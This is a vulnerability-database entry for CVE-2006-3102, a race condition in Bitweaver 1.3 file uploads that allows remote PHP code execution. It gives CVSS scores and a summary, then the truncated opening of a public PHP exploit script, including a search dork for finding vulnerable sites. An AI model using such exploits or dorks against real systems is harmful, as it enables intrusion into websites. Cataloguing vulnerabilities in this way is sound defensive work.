5.1
CVSSv2

CVE-2006-3102

Published: 21/06/2006 Updated: 18/10/2018
CVSS v2 Base Score: 5.1 | Impact Score: 6.4 | Exploitability Score: 4.9
VMScore: 515
Vector: AV:N/AC:H/Au:N/C:P/I:P/A:P

Vulnerability Summary

Race condition in articles/BitArticle.php in Bitweaver 1.3, when run on Apache with the mod_mime extension, allows remote malicious users to execute arbitrary PHP code by uploading arbitrary files with double extensions, which are stored for a small period of time under the webroot in the temp/articles directory.

Vulnerable Product Search on Vulmon Subscribe to Product

bitweaver bitweaver 1.3

Exploits

#!/usr/bin/php -q -d short_open_tag=on <? echo "bitweaver <= v13 'tmpImagePath' attachment mod_mime exploit\r\n"; echo "by rgod rgod@autisticiorg\r\n"; echo "site: retrogodaltervistaorg\r\n"; echo "dork: \"powered by bitweaver\"\r\n\r\n"; if ($argc<4) { echo "Usage: php "$argv[0]" host path cmd OPTIONS\r\n"; echo "host: ...